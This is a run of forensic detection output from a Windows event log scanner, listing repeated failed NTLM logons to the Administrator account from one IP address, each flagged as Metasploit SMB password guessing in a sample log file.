14462016-09-20 01:50:14.427 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14472016-09-20 01:50:14.427 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14482016-09-20 01:50:14.468 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14492016-09-20 01:50:14.468 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14502016-09-20 01:50:14.503 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14512016-09-20 01:50:14.503 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14522016-09-20 01:50:14.543 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14532016-09-20 01:50:14.543 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14542016-09-20 01:50:14.597 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14552016-09-20 01:50:14.597 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14562016-09-20 01:50:14.637 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14572016-09-20 01:50:14.637 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14582016-09-20 01:50:14.673 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14592016-09-20 01:50:14.673 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14602016-09-20 01:50:14.708 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14612016-09-20 01:50:14.708 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14622016-09-20 01:50:14.748 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14632016-09-20 01:50:14.748 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14642016-09-20 01:50:14.788 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14652016-09-20 01:50:14.788 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14662016-09-20 01:50:14.824 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14672016-09-20 01:50:14.824 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14682016-09-20 01:50:14.868 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14692016-09-20 01:50:14.868 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14702016-09-20 01:50:14.905 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14712016-09-20 01:50:14.905 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14722016-09-20 01:50:14.950 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14732016-09-20 01:50:14.950 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14742016-09-20 01:50:15.004 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14752016-09-20 01:50:15.004 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14762016-09-20 01:50:15.056 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14772016-09-20 01:50:15.056 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14782016-09-20 01:50:15.096 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14792016-09-20 01:50:15.096 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14802016-09-20 01:50:15.128 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14812016-09-20 01:50:15.128 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14822016-09-20 01:50:15.168 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14832016-09-20 01:50:15.168 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14842016-09-20 01:50:15.211 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14852016-09-20 01:50:15.211 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14862016-09-20 01:50:15.254 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14872016-09-20 01:50:15.254 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14882016-09-20 01:50:15.289 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14892016-09-20 01:50:15.289 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14902016-09-20 01:50:15.337 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14912016-09-20 01:50:15.337 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14922016-09-20 01:50:15.380 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14932016-09-20 01:50:15.380 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14942016-09-20 01:50:15.420 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14952016-09-20 01:50:15.420 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14962016-09-20 01:50:15.456 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14972016-09-20 01:50:15.456 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14982016-09-20 01:50:15.504 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14992016-09-20 01:50:15.504 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15002016-09-20 01:50:15.554 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15012016-09-20 01:50:15.554 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15022016-09-20 01:50:15.595 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15032016-09-20 01:50:15.595 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15042016-09-20 01:50:15.644 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15052016-09-20 01:50:15.644 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15062016-09-20 01:50:15.685 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15072016-09-20 01:50:15.685 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15082016-09-20 01:50:15.733 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15092016-09-20 01:50:15.733 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15102016-09-20 01:50:15.772 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15112016-09-20 01:50:15.772 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15122016-09-20 01:50:15.807 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15132016-09-20 01:50:15.807 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15142016-09-20 01:50:15.852 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15152016-09-20 01:50:15.852 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15162016-09-20 01:50:15.885 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15172016-09-20 01:50:15.885 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15182016-09-20 01:50:15.924 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15192016-09-20 01:50:15.924 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15202016-09-20 01:50:15.966 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15212016-09-20 01:50:15.966 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15222016-09-20 01:50:16.012 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15232016-09-20 01:50:16.012 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15242016-09-20 01:50:16.059 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15252016-09-20 01:50:16.059 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15262016-09-20 01:50:16.092 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15272016-09-20 01:50:16.092 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15282016-09-20 01:50:16.133 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15292016-09-20 01:50:16.133 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15302016-09-20 01:50:16.166 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15312016-09-20 01:50:16.166 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15322016-09-20 01:50:16.209 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15332016-09-20 01:50:16.209 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15342016-09-20 01:50:16.252 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15352016-09-20 01:50:16.252 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15362016-09-20 01:50:16.289 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15372016-09-20 01:50:16.289 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15382016-09-20 01:50:16.328 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15392016-09-20 01:50:16.328 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15402016-09-20 01:50:16.427 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15412016-09-20 01:50:16.427 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
